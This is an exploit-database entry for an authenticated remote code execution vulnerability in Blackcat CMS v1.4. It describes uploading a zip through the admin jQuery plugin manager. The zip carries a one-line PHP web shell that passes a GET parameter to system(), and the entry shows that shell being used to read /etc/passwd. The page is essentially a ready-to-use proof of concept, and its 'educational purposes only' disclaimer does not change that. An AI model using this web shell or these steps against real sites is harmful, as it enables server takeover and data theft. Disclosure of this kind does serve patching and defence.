Exploits / Vulnerability Discovered : 2023-07-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Blackcat cms v1.4 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: blackcat Cms
Version: v1.4
Bugs: RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account as admin
2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3. upload zip file but this zip file must contains poc.php
poc.php file contents
<?php $a=$_GET['code']; echo system($a);?>
4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd